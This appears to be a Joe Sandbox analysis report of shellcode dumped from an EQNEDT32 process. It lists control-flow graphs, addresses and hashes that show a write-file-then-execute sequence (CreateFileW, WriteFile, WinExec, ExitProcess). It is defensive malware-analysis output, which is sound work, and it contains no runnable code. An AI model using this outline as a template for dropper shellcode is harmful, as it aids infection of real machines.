                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 924 35002df-35002f0 926 3500264 924->926 927 3500315-3500394 924->927 928 3500216-3500277 926->928 929 350026b 926->929 931 350027d-3500283 927->931 940 350039a-35003de call 35003b7 927->940 928->929 928->931 929->931 931->927 943 3500431-350044d 940->943 944 35003e1 940->944 948 350044e-3500451 call 350045f 943->948 946 3500452-3500454 944->946 947 35003e3-35003e6 944->947 950 3500455-3500457 946->950 951 35004bb call 35004cf 946->951 947->948 949 35003e9 947->949 948->946 953 35003eb-3500403 949->953 954 350045e-350046f 949->954 956 3500459-350045a 950->956 957 35004be-3500507 call 35004f6 950->957 951->957 960 3500474-3500481 CreateFileW call 3500496 953->960 964 3500405-3500409 953->964 954->960 956->954 972 3500509-350050b 957->972 973 350056e 957->973 966 3500486-3500494 960->966 964->954 967 350040b 964->967 970 350040d-3500430 call 350044c 967->970 971 350047f 967->971 970->943 971->966 975 3500481 call 3500496 971->975 976 3500583-3500584 972->976 977 350050e 972->977 978 3500570-350057c call 350058f 973->978 979 3500594-35005a2 call 35005ab 973->979 975->966 981 3500585-3500587 976->981 982 35005eb-35005ec 976->982 977->981 984 3500511-3500557 call 3500535 977->984 995 35005f2 978->995 1010 350057e 978->1010 1004 350060d-3500634 WriteFile 979->1004 1012 35005a4 979->1012 988 35005fa-35005ff 981->988 989 350058a-350058c 981->989 987 35005ee 982->987 1008 350055a 984->1008 1009 35005cf 984->1009 987->995 996 3500601-3500606 988->996 997 3500636-3500641 call 350064a 988->997 998 35005f3-35005f9 989->998 999 350058e-3500592 989->999 995->998 1003 3500608 996->1003 996->1004 1013 3500643-3500648 997->1013 1014 35006a8-35006b3 WinExec call 35006bc 997->1014 998->988 999->979 1003->1004 1004->987 1018 35005d1 1008->1018 1019 350055d-3500584 call 350058f 1008->1019 1009->1018 1015 3500580 1010->1015 1016 35005d2-35005e6 call 35005e9 1010->1016 1020 35005a6-35005af 1012->1020 1021 350060b 1012->1021 1022 350064c-3500662 call 350066b 1013->1022 1039 3500705 1014->1039 1040 35006b5 1014->1040 1015->976 1035 35005e8 1016->1035 1036 3500649 1016->1036 1018->1016 1019->982 1037 3500586-3500587 1019->1037 1021->1004 1043 35006d0-35006d8 1022->1043 1044 3500664 1022->1044 1035->982 1036->1022 1037->988 1037->989 1041 3500707-350070b 1039->1041 1042 350070d-3500711 1039->1042 1045 3500726-3500728 1040->1045 1046 35006b7-35006c1 ExitProcess 1040->1046 1041->1042 1049 3500719-3500720 1041->1049 1042->1045 1050 3500713-3500717 1042->1050 1047 35006da-35006dc 1043->1047 1048 35006fe-3500702 1043->1048 1051 3500666-3500667 1044->1051 1052 35006cf 1044->1052 1054 3500738-3500739 1045->1054 1055 35006dd-35006e2 1047->1055 1048->1039 1057 3500722 1049->1057 1058 3500724 1049->1058 1050->1045 1050->1049 1051->1055 1056 3500669-3500695 call 350069c 1051->1056 1052->1043 1059 35006d1-35006e2 call 35006eb 1055->1059 1060 35006e4-35006e8 1055->1060 1056->1052 1057->1045 1058->1045 1061 350072a-3500733 1058->1061 1059->1060 1066 3500735 1061->1066 1067 35006fc-35006ff 1061->1067 1066->1054 1067->1061 1070 3500701 1067->1070 1070->1039
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2838702978-0
                                                                                                                                                • Opcode ID: bc056b37b8d5430754652d067cfdafb9532548946dcc738dfdbd35fd5d06733e
                                                                                                                                                • Instruction ID: a798a3d805cc2d42b4f3441fac9b96f09d4445b7bd75b48b1973b5723af15959
                                                                                                                                                • Opcode Fuzzy Hash: bc056b37b8d5430754652d067cfdafb9532548946dcc738dfdbd35fd5d06733e
                                                                                                                                                • Instruction Fuzzy Hash: 2341F26140D7C18FD716D670AE5A7A4BF607B12500F0C4A9BC4C64F0F3D2A7524A935B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1072 35002f5-3500314 1073 3500315-3500394 1072->1073 1080 350039a-35003de call 35003b7 1073->1080 1081 350027d-3500283 1073->1081 1084 3500431-350044d 1080->1084 1085 35003e1 1080->1085 1081->1073 1089 350044e-3500451 call 350045f 1084->1089 1087 3500452-3500454 1085->1087 1088 35003e3-35003e6 1085->1088 1091 3500455-3500457 1087->1091 1092 35004bb call 35004cf 1087->1092 1088->1089 1090 35003e9 1088->1090 1089->1087 1094 35003eb-3500403 1090->1094 1095 350045e-350046f 1090->1095 1097 3500459-350045a 1091->1097 1098 35004be-3500507 call 35004f6 1091->1098 1092->1098 1101 3500474-3500481 CreateFileW call 3500496 1094->1101 1105 3500405-3500409 1094->1105 1095->1101 1097->1095 1113 3500509-350050b 1098->1113 1114 350056e 1098->1114 1107 3500486-3500494 1101->1107 1105->1095 1108 350040b 1105->1108 1111 350040d-3500430 call 350044c 1108->1111 1112 350047f 1108->1112 1111->1084 1112->1107 1116 3500481 call 3500496 1112->1116 1117 3500583-3500584 1113->1117 1118 350050e 1113->1118 1119 3500570-350057c call 350058f 1114->1119 1120 3500594-35005a2 call 35005ab 1114->1120 1116->1107 1122 3500585-3500587 1117->1122 1123 35005eb-35005ec 1117->1123 1118->1122 1125 3500511-3500557 call 3500535 1118->1125 1136 35005f2 1119->1136 1151 350057e 1119->1151 1145 350060d-3500634 WriteFile 1120->1145 1153 35005a4 1120->1153 1129 35005fa-35005ff 1122->1129 1130 350058a-350058c 1122->1130 1128 35005ee 1123->1128 1149 350055a 1125->1149 1150 35005cf 1125->1150 1128->1136 1137 3500601-3500606 1129->1137 1138 3500636-3500641 call 350064a 1129->1138 1139 35005f3-35005f9 1130->1139 1140 350058e-3500592 1130->1140 1136->1139 1144 3500608 1137->1144 1137->1145 1154 3500643-3500648 1138->1154 1155 35006a8-35006b3 WinExec call 35006bc 1138->1155 1139->1129 1140->1120 1144->1145 1145->1128 1159 35005d1 1149->1159 1160 350055d-3500584 call 350058f 1149->1160 1150->1159 1156 3500580 1151->1156 1157 35005d2-35005e6 call 35005e9 1151->1157 1161 35005a6-35005af 1153->1161 1162 350060b 1153->1162 1163 350064c-3500662 call 350066b 1154->1163 1180 3500705 1155->1180 1181 35006b5 1155->1181 1156->1117 1176 35005e8 1157->1176 1177 3500649 1157->1177 1159->1157 1160->1123 1178 3500586-3500587 1160->1178 1162->1145 1184 35006d0-35006d8 1163->1184 1185 3500664 1163->1185 1176->1123 1177->1163 1178->1129 1178->1130 1182 3500707-350070b 1180->1182 1183 350070d-3500711 1180->1183 1186 3500726-3500728 1181->1186 1187 35006b7-35006c1 ExitProcess 1181->1187 1182->1183 1190 3500719-3500720 1182->1190 1183->1186 1191 3500713-3500717 1183->1191 1188 35006da-35006dc 1184->1188 1189 35006fe-3500702 1184->1189 1192 3500666-3500667 1185->1192 1193 35006cf 1185->1193 1195 3500738-3500739 1186->1195 1196 35006dd-35006e2 1188->1196 1189->1180 1198 3500722 1190->1198 1199 3500724 1190->1199 1191->1186 1191->1190 1192->1196 1197 3500669-3500695 call 350069c 1192->1197 1193->1184 1200 35006d1-35006e2 call 35006eb 1196->1200 1201 35006e4-35006e8 1196->1201 1197->1193 1198->1186 1199->1186 1202 350072a-3500733 1199->1202 1200->1201 1207 3500735 1202->1207 1208 35006fc-35006ff 1202->1208 1207->1195 1208->1202 1211 3500701 1208->1211 1211->1180
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2838702978-0
                                                                                                                                                • Opcode ID: 67c296a0f0c452991ff466505c069b148f2200ff914e37d85d94933a84017cb2
                                                                                                                                                • Instruction ID: 3d3f27ad21cbe9d8aeac08ceedf0ff0f0c8eed98a959b800028575aaad61f8bf
                                                                                                                                                • Opcode Fuzzy Hash: 67c296a0f0c452991ff466505c069b148f2200ff914e37d85d94933a84017cb2
                                                                                                                                                • Instruction Fuzzy Hash: 9631106140D3C05FD712D720AE9A7A5BF60BB13600F1D8ADBC5C94F1F3E2A7524A936A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1213 350031f-350033c 1214 3500347 1213->1214 1215 35002cf-350036f 1213->1215 1219 3500385-3500388 1214->1219 1218 35002d4 1215->1218 1215->1219 1220 35002d8-3500394 1218->1220 1221 3500297-350029f 1218->1221 1219->1220 1223 350039a-35003de call 35003b7 1220->1223 1224 350027d-3500315 1220->1224 1221->1214 1228 3500431-350044d 1223->1228 1229 35003e1 1223->1229 1224->1221 1233 350044e-3500451 call 350045f 1228->1233 1231 3500452-3500454 1229->1231 1232 35003e3-35003e6 1229->1232 1235 3500455-3500457 1231->1235 1236 35004bb call 35004cf 1231->1236 1232->1233 1234 35003e9 1232->1234 1233->1231 1238 35003eb-3500403 1234->1238 1239 350045e-350046f 1234->1239 1241 3500459-350045a 1235->1241 1242 35004be-3500507 call 35004f6 1235->1242 1236->1242 1245 3500474-3500481 CreateFileW call 3500496 1238->1245 1249 3500405-3500409 1238->1249 1239->1245 1241->1239 1257 3500509-350050b 1242->1257 1258 350056e 1242->1258 1251 3500486-3500494 1245->1251 1249->1239 1252 350040b 1249->1252 1255 350040d-3500430 call 350044c 1252->1255 1256 350047f 1252->1256 1255->1228 1256->1251 1260 3500481 call 3500496 1256->1260 1261 3500583-3500584 1257->1261 1262 350050e 1257->1262 1263 3500570-350057c call 350058f 1258->1263 1264 3500594-35005a2 call 35005ab 1258->1264 1260->1251 1266 3500585-3500587 1261->1266 1267 35005eb-35005ec 1261->1267 1262->1266 1269 3500511-3500557 call 3500535 1262->1269 1280 35005f2 1263->1280 1295 350057e 1263->1295 1289 350060d-3500634 WriteFile 1264->1289 1297 35005a4 1264->1297 1273 35005fa-35005ff 1266->1273 1274 350058a-350058c 1266->1274 1272 35005ee 1267->1272 1293 350055a 1269->1293 1294 35005cf 1269->1294 1272->1280 1281 3500601-3500606 1273->1281 1282 3500636-3500641 call 350064a 1273->1282 1283 35005f3-35005f9 1274->1283 1284 350058e-3500592 1274->1284 1280->1283 1288 3500608 1281->1288 1281->1289 1298 3500643-3500648 1282->1298 1299 35006a8-35006b3 WinExec call 35006bc 1282->1299 1283->1273 1284->1264 1288->1289 1289->1272 1303 35005d1 1293->1303 1304 350055d-3500584 call 350058f 1293->1304 1294->1303 1300 3500580 1295->1300 1301 35005d2-35005e6 call 35005e9 1295->1301 1305 35005a6-35005af 1297->1305 1306 350060b 1297->1306 1307 350064c-3500662 call 350066b 1298->1307 1324 3500705 1299->1324 1325 35006b5 1299->1325 1300->1261 1320 35005e8 1301->1320 1321 3500649 1301->1321 1303->1301 1304->1267 1322 3500586-3500587 1304->1322 1306->1289 1328 35006d0-35006d8 1307->1328 1329 3500664 1307->1329 1320->1267 1321->1307 1322->1273 1322->1274 1326 3500707-350070b 1324->1326 1327 350070d-3500711 1324->1327 1330 3500726-3500728 1325->1330 1331 35006b7-35006c1 ExitProcess 1325->1331 1326->1327 1334 3500719-3500720 1326->1334 1327->1330 1335 3500713-3500717 1327->1335 1332 35006da-35006dc 1328->1332 1333 35006fe-3500702 1328->1333 1336 3500666-3500667 1329->1336 1337 35006cf 1329->1337 1339 3500738-3500739 1330->1339 1340 35006dd-35006e2 1332->1340 1333->1324 1342 3500722 1334->1342 1343 3500724 1334->1343 1335->1330 1335->1334 1336->1340 1341 3500669-3500695 call 350069c 1336->1341 1337->1328 1344 35006d1-35006e2 call 35006eb 1340->1344 1345 35006e4-35006e8 1340->1345 1341->1337 1342->1330 1343->1330 1346 350072a-3500733 1343->1346 1344->1345 1351 3500735 1346->1351 1352 35006fc-35006ff 1346->1352 1351->1339 1352->1346 1355 3500701 1352->1355 1355->1324
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2838702978-0
                                                                                                                                                • Opcode ID: c2719f5805c7fc00575cc19c4675a2703bd0b635e5d38dcdfb319bb3d945f4c1
                                                                                                                                                • Instruction ID: 52adc37cb644a9868b5b7fd257436b3ad297a756c3cb51f0e741d88a504a4ea7
                                                                                                                                                • Opcode Fuzzy Hash: c2719f5805c7fc00575cc19c4675a2703bd0b635e5d38dcdfb319bb3d945f4c1
                                                                                                                                                • Instruction Fuzzy Hash: B731F26180D7C15FD712D670AE5A7A4BF60BB13600F0C8ADBC1C54F5F3E26A9246935B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1357 3500254-350026b 1360 350027d-3500394 1357->1360 1368 350039a-35003de call 35003b7 1360->1368 1371 3500431-350044d 1368->1371 1372 35003e1 1368->1372 1376 350044e-3500451 call 350045f 1371->1376 1374 3500452-3500454 1372->1374 1375 35003e3-35003e6 1372->1375 1378 3500455-3500457 1374->1378 1379 35004bb call 35004cf 1374->1379 1375->1376 1377 35003e9 1375->1377 1376->1374 1381 35003eb-3500403 1377->1381 1382 350045e-350046f 1377->1382 1384 3500459-350045a 1378->1384 1385 35004be-3500507 call 35004f6 1378->1385 1379->1385 1388 3500474-3500481 CreateFileW call 3500496 1381->1388 1392 3500405-3500409 1381->1392 1382->1388 1384->1382 1400 3500509-350050b 1385->1400 1401 350056e 1385->1401 1394 3500486-3500494 1388->1394 1392->1382 1395 350040b 1392->1395 1398 350040d-3500430 call 350044c 1395->1398 1399 350047f 1395->1399 1398->1371 1399->1394 1403 3500481 call 3500496 1399->1403 1404 3500583-3500584 1400->1404 1405 350050e 1400->1405 1406 3500570-350057c call 350058f 1401->1406 1407 3500594-35005a2 call 35005ab 1401->1407 1403->1394 1409 3500585-3500587 1404->1409 1410 35005eb-35005ec 1404->1410 1405->1409 1412 3500511-3500557 call 3500535 1405->1412 1423 35005f2 1406->1423 1438 350057e 1406->1438 1432 350060d-3500634 WriteFile 1407->1432 1440 35005a4 1407->1440 1416 35005fa-35005ff 1409->1416 1417 350058a-350058c 1409->1417 1415 35005ee 1410->1415 1436 350055a 1412->1436 1437 35005cf 1412->1437 1415->1423 1424 3500601-3500606 1416->1424 1425 3500636-3500641 call 350064a 1416->1425 1426 35005f3-35005f9 1417->1426 1427 350058e-3500592 1417->1427 1423->1426 1431 3500608 1424->1431 1424->1432 1441 3500643-3500648 1425->1441 1442 35006a8-35006b3 WinExec call 35006bc 1425->1442 1426->1416 1427->1407 1431->1432 1432->1415 1446 35005d1 1436->1446 1447 350055d-3500584 call 350058f 1436->1447 1437->1446 1443 3500580 1438->1443 1444 35005d2-35005e6 call 35005e9 1438->1444 1448 35005a6-35005af 1440->1448 1449 350060b 1440->1449 1450 350064c-3500662 call 350066b 1441->1450 1467 3500705 1442->1467 1468 35006b5 1442->1468 1443->1404 1463 35005e8 1444->1463 1464 3500649 1444->1464 1446->1444 1447->1410 1465 3500586-3500587 1447->1465 1449->1432 1471 35006d0-35006d8 1450->1471 1472 3500664 1450->1472 1463->1410 1464->1450 1465->1416 1465->1417 1469 3500707-350070b 1467->1469 1470 350070d-3500711 1467->1470 1473 3500726-3500728 1468->1473 1474 35006b7-35006c1 ExitProcess 1468->1474 1469->1470 1477 3500719-3500720 1469->1477 1470->1473 1478 3500713-3500717 1470->1478 1475 35006da-35006dc 1471->1475 1476 35006fe-3500702 1471->1476 1479 3500666-3500667 1472->1479 1480 35006cf 1472->1480 1482 3500738-3500739 1473->1482 1483 35006dd-35006e2 1475->1483 1476->1467 1485 3500722 1477->1485 1486 3500724 1477->1486 1478->1473 1478->1477 1479->1483 1484 3500669-3500695 call 350069c 1479->1484 1480->1471 1487 35006d1-35006e2 call 35006eb 1483->1487 1488 35006e4-35006e8 1483->1488 1484->1480 1485->1473 1486->1473 1489 350072a-3500733 1486->1489 1487->1488 1494 3500735 1489->1494 1495 35006fc-35006ff 1489->1495 1494->1482 1495->1489 1498 3500701 1495->1498 1498->1467
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2838702978-0
                                                                                                                                                • Opcode ID: 543785cbb62a5d49cdbbe7b18975cb33ced1f716282e23c36375f809c686baf6
                                                                                                                                                • Instruction ID: c6dcc0047ae156798a9baf7a57d71fb600b1f998160c9ed8d2eea54da9dd3f6a
                                                                                                                                                • Opcode Fuzzy Hash: 543785cbb62a5d49cdbbe7b18975cb33ced1f716282e23c36375f809c686baf6
                                                                                                                                                • Instruction Fuzzy Hash: 8631DD6180D3C19FD716D6706E6A7A4BF607B12500B0D8ADBC4C64F1F3E2A7924A935B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1500 3500249 1501 3500272 1500->1501 1502 3500255-3500277 1500->1502 1501->1502 1504 350026b 1502->1504 1505 350027d-3500394 1502->1505 1504->1505 1513 350039a-35003de call 35003b7 1505->1513 1516 3500431-350044d 1513->1516 1517 35003e1 1513->1517 1521 350044e-3500451 call 350045f 1516->1521 1519 3500452-3500454 1517->1519 1520 35003e3-35003e6 1517->1520 1523 3500455-3500457 1519->1523 1524 35004bb call 35004cf 1519->1524 1520->1521 1522 35003e9 1520->1522 1521->1519 1526 35003eb-3500403 1522->1526 1527 350045e-350046f 1522->1527 1529 3500459-350045a 1523->1529 1530 35004be-3500507 call 35004f6 1523->1530 1524->1530 1533 3500474-3500481 CreateFileW call 3500496 1526->1533 1537 3500405-3500409 1526->1537 1527->1533 1529->1527 1545 3500509-350050b 1530->1545 1546 350056e 1530->1546 1539 3500486-3500494 1533->1539 1537->1527 1540 350040b 1537->1540 1543 350040d-3500430 call 350044c 1540->1543 1544 350047f 1540->1544 1543->1516 1544->1539 1548 3500481 call 3500496 1544->1548 1549 3500583-3500584 1545->1549 1550 350050e 1545->1550 1551 3500570-350057c call 350058f 1546->1551 1552 3500594-35005a2 call 35005ab 1546->1552 1548->1539 1554 3500585-3500587 1549->1554 1555 35005eb-35005ec 1549->1555 1550->1554 1557 3500511-3500557 call 3500535 1550->1557 1568 35005f2 1551->1568 1583 350057e 1551->1583 1577 350060d-3500634 WriteFile 1552->1577 1585 35005a4 1552->1585 1561 35005fa-35005ff 1554->1561 1562 350058a-350058c 1554->1562 1560 35005ee 1555->1560 1581 350055a 1557->1581 1582 35005cf 1557->1582 1560->1568 1569 3500601-3500606 1561->1569 1570 3500636-3500641 call 350064a 1561->1570 1571 35005f3-35005f9 1562->1571 1572 350058e-3500592 1562->1572 1568->1571 1576 3500608 1569->1576 1569->1577 1586 3500643-3500648 1570->1586 1587 35006a8-35006b3 WinExec call 35006bc 1570->1587 1571->1561 1572->1552 1576->1577 1577->1560 1591 35005d1 1581->1591 1592 350055d-3500584 call 350058f 1581->1592 1582->1591 1588 3500580 1583->1588 1589 35005d2-35005e6 call 35005e9 1583->1589 1593 35005a6-35005af 1585->1593 1594 350060b 1585->1594 1595 350064c-3500662 call 350066b 1586->1595 1612 3500705 1587->1612 1613 35006b5 1587->1613 1588->1549 1608 35005e8 1589->1608 1609 3500649 1589->1609 1591->1589 1592->1555 1610 3500586-3500587 1592->1610 1594->1577 1616 35006d0-35006d8 1595->1616 1617 3500664 1595->1617 1608->1555 1609->1595 1610->1561 1610->1562 1614 3500707-350070b 1612->1614 1615 350070d-3500711 1612->1615 1618 3500726-3500728 1613->1618 1619 35006b7-35006c1 ExitProcess 1613->1619 1614->1615 1622 3500719-3500720 1614->1622 1615->1618 1623 3500713-3500717 1615->1623 1620 35006da-35006dc 1616->1620 1621 35006fe-3500702 1616->1621 1624 3500666-3500667 1617->1624 1625 35006cf 1617->1625 1627 3500738-3500739 1618->1627 1628 35006dd-35006e2 1620->1628 1621->1612 1630 3500722 1622->1630 1631 3500724 1622->1631 1623->1618 1623->1622 1624->1628 1629 3500669-3500695 call 350069c 1624->1629 1625->1616 1632 35006d1-35006e2 call 35006eb 1628->1632 1633 35006e4-35006e8 1628->1633 1629->1625 1630->1618 1631->1618 1634 350072a-3500733 1631->1634 1632->1633 1639 3500735 1634->1639 1640 35006fc-35006ff 1634->1640 1639->1627 1640->1634 1643 3500701 1640->1643 1643->1612
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2838702978-0
                                                                                                                                                • Opcode ID: b502d464c79e48f11739a65e7da5e3c60fe015f4616ed4c2ff152b7e3ce17e7c
                                                                                                                                                • Instruction ID: 5840ea24fb386d59ea6c55d74f7a7e9c72dd42f05498abddac7a181b71ffee31
                                                                                                                                                • Opcode Fuzzy Hash: b502d464c79e48f11739a65e7da5e3c60fe015f4616ed4c2ff152b7e3ce17e7c
                                                                                                                                                • Instruction Fuzzy Hash: 7E31CE6140D7C19FD716D630AE6A7A4BF60BB12500B0C8A9BC4C64F1F3E2A7924A935B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1645 35002eb 1646 3500255-3500277 1645->1646 1647 3500315-3500394 1645->1647 1650 350026b 1646->1650 1651 350027d-3500283 1646->1651 1647->1651 1657 350039a-35003de call 35003b7 1647->1657 1650->1651 1651->1647 1660 3500431-350044d 1657->1660 1661 35003e1 1657->1661 1665 350044e-3500451 call 350045f 1660->1665 1663 3500452-3500454 1661->1663 1664 35003e3-35003e6 1661->1664 1667 3500455-3500457 1663->1667 1668 35004bb call 35004cf 1663->1668 1664->1665 1666 35003e9 1664->1666 1665->1663 1670 35003eb-3500403 1666->1670 1671 350045e-350046f 1666->1671 1673 3500459-350045a 1667->1673 1674 35004be-3500507 call 35004f6 1667->1674 1668->1674 1677 3500474-3500481 CreateFileW call 3500496 1670->1677 1681 3500405-3500409 1670->1681 1671->1677 1673->1671 1689 3500509-350050b 1674->1689 1690 350056e 1674->1690 1683 3500486-3500494 1677->1683 1681->1671 1684 350040b 1681->1684 1687 350040d-3500430 call 350044c 1684->1687 1688 350047f 1684->1688 1687->1660 1688->1683 1692 3500481 call 3500496 1688->1692 1693 3500583-3500584 1689->1693 1694 350050e 1689->1694 1695 3500570-350057c call 350058f 1690->1695 1696 3500594-35005a2 call 35005ab 1690->1696 1692->1683 1698 3500585-3500587 1693->1698 1699 35005eb-35005ec 1693->1699 1694->1698 1701 3500511-3500557 call 3500535 1694->1701 1712 35005f2 1695->1712 1727 350057e 1695->1727 1721 350060d-3500634 WriteFile 1696->1721 1729 35005a4 1696->1729 1705 35005fa-35005ff 1698->1705 1706 350058a-350058c 1698->1706 1704 35005ee 1699->1704 1725 350055a 1701->1725 1726 35005cf 1701->1726 1704->1712 1713 3500601-3500606 1705->1713 1714 3500636-3500641 call 350064a 1705->1714 1715 35005f3-35005f9 1706->1715 1716 350058e-3500592 1706->1716 1712->1715 1720 3500608 1713->1720 1713->1721 1730 3500643-3500648 1714->1730 1731 35006a8-35006b3 WinExec call 35006bc 1714->1731 1715->1705 1716->1696 1720->1721 1721->1704 1735 35005d1 1725->1735 1736 350055d-3500584 call 350058f 1725->1736 1726->1735 1732 3500580 1727->1732 1733 35005d2-35005e6 call 35005e9 1727->1733 1737 35005a6-35005af 1729->1737 1738 350060b 1729->1738 1739 350064c-3500662 call 350066b 1730->1739 1756 3500705 1731->1756 1757 35006b5 1731->1757 1732->1693 1752 35005e8 1733->1752 1753 3500649 1733->1753 1735->1733 1736->1699 1754 3500586-3500587 1736->1754 1738->1721 1760 35006d0-35006d8 1739->1760 1761 3500664 1739->1761 1752->1699 1753->1739 1754->1705 1754->1706 1758 3500707-350070b 1756->1758 1759 350070d-3500711 1756->1759 1762 3500726-3500728 1757->1762 1763 35006b7-35006c1 ExitProcess 1757->1763 1758->1759 1766 3500719-3500720 1758->1766 1759->1762 1767 3500713-3500717 1759->1767 1764 35006da-35006dc 1760->1764 1765 35006fe-3500702 1760->1765 1768 3500666-3500667 1761->1768 1769 35006cf 1761->1769 1771 3500738-3500739 1762->1771 1772 35006dd-35006e2 1764->1772 1765->1756 1774 3500722 1766->1774 1775 3500724 1766->1775 1767->1762 1767->1766 1768->1772 1773 3500669-3500695 call 350069c 1768->1773 1769->1760 1776 35006d1-35006e2 call 35006eb 1772->1776 1777 35006e4-35006e8 1772->1777 1773->1769 1774->1762 1775->1762 1778 350072a-3500733 1775->1778 1776->1777 1783 3500735 1778->1783 1784 35006fc-35006ff 1778->1784 1783->1771 1784->1778 1787 3500701 1784->1787 1787->1756
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2838702978-0
                                                                                                                                                • Opcode ID: d488263ba51873f234b2d27a52a4654db955e3cefa6851767f5ab00487be5ae1
                                                                                                                                                • Instruction ID: 1e5c9c174599fb3e0ce7f568f208af16dce7b99c47b287b16b619c1b6ef5e20a
                                                                                                                                                • Opcode Fuzzy Hash: d488263ba51873f234b2d27a52a4654db955e3cefa6851767f5ab00487be5ae1
                                                                                                                                                • Instruction Fuzzy Hash: CD31CC6180D7C19FD716D630AE6A7A4BF607B12500B0C8A9B84C64F1F3E2A7924A935B
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • LoadLibraryW.KERNEL32(03500486), ref: 03500496
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                • Opcode ID: 7d611646573f973f29cd3d571ff4b855686d7c636389b3da5a965bb4516b47b8
                                                                                                                                                • Instruction ID: a9e022d8b043e4f2dacad34ba93c719f4282ccc3a4d85a07611995ad94d4418a
                                                                                                                                                • Opcode Fuzzy Hash: 7d611646573f973f29cd3d571ff4b855686d7c636389b3da5a965bb4516b47b8
                                                                                                                                                • Instruction Fuzzy Hash: C531AB6044D7C12ED722E7B4AD6AB6ABF74BF83600F1885CEE1814F1F3E6965205D326
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000002.00000002.535817886.0000000003500000.00000004.00000020.00020000.00000000.sdmp, Offset: 03500000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_2_2_3500000_EQNEDT32.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateExitFileProcess
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2838702978-0
                                                                                                                                                • Opcode ID: fbbb9a6aa8e1115c8715456c65587e538df273578a5e5e8de951d4dbb5afee95
                                                                                                                                                • Instruction ID: 9e45dd8084ccc71f76ccbe8e682f25cc0ae282efa208a7428d2fb5134b74348a
                                                                                                                                                • Opcode Fuzzy Hash: fbbb9a6aa8e1115c8715456c65587e538df273578a5e5e8de951d4dbb5afee95
